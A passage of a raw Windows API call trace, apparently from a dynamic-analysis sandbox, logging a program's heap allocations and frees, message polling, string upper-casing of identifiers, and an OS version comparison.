lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.710] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.710] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.710] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.711] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.712] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.712] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.712] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.713] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.714] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0257.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.715] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.716] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.716] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0257.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0257.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.718] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.718] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.719] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.719] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.720] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.720] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 